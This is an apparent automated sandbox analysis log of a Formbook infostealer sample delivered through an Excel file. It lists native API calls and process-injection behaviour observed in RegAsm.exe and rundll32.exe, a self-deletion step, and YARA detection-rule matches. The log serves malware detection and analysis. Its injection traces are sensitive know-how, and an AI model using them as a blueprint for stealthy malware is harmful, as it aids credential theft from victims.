          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A0060 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A10D0 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A1148 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A010C NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A01D4 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FA50 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FA20 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FAB8 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FB50 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279F8CC NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279F938 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A1930 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FE24 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FF34 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FFFC NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FC48 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A0C40 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FC30 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0279FD5C NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02540048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02540078 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02540060 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025410D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02541148 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0254010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025401D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02541930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02540C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0253FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02541D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E8180 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E8230 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E82B0 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E8360 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E822A NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E82AA NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E835E NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00BFFF88
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00BFF37F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B99F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041CB27
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408C2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041C53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041BD88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027AE2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02851238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027FA37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027B7353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_028563BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027B2305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027D63DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027AF3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027C905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027B3040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027DD005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027AE0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0282D06D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027FA634
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02852622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027BE6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027B4680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0283579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027E57C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027BC7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027ED47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0283443E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027C1489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027E5485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027F6540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_028305E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027B351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027CC5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02863A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0285CBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02836BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0283DBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027D7B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027AFBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027D286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027BC85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0282F8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0284F8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0285098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027C69FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0283394B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027B29B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02835955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027CEE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027E2E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027DDF7C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0284CFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027C0F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02822FDC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027BCD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027E0D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0284FDDD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025F1238
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0254E2E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02557353
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0259A37B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02552305
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025763DB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0254F3CF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025F63BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0256905A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02553040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025CD06D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0257D005
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0254E0C6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0259A634
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025F2622
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0255E6C1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02554680
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025857C3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025D579A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0255C7BC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0258D47D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025D443E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02585485
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02561489
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02596540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0255351F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0256C5F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025D05E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02603A83
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02577B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0254FBD7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025DDBDA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025D6BCB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025FCBA4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0255C85C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0257286D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025CF8C4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025EF8EE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025D5955
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025D394B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025669FE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025F098E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025529B2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0256EE4C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02582E2F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0257DF7C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025DBF14
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02560F3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025C2FDC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025ECFB1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025DAC5E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0255CD5B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02580D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025EFDDD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EC53B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB954
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB998
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000ECB27
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D8C2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D8C30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D2D88
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EBD88
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D2D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D2FB0
          Source: Order List.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 027F373B appears 245 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 027F3F92 appears 132 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0281F970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 027AE2A8 appears 38 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 027ADF5C appears 123 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 025BF970 appears 84 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0259373B appears 248 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02593F92 appears 132 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0254E2A8 appears 58 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0254DF5C appears 124 times
          Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
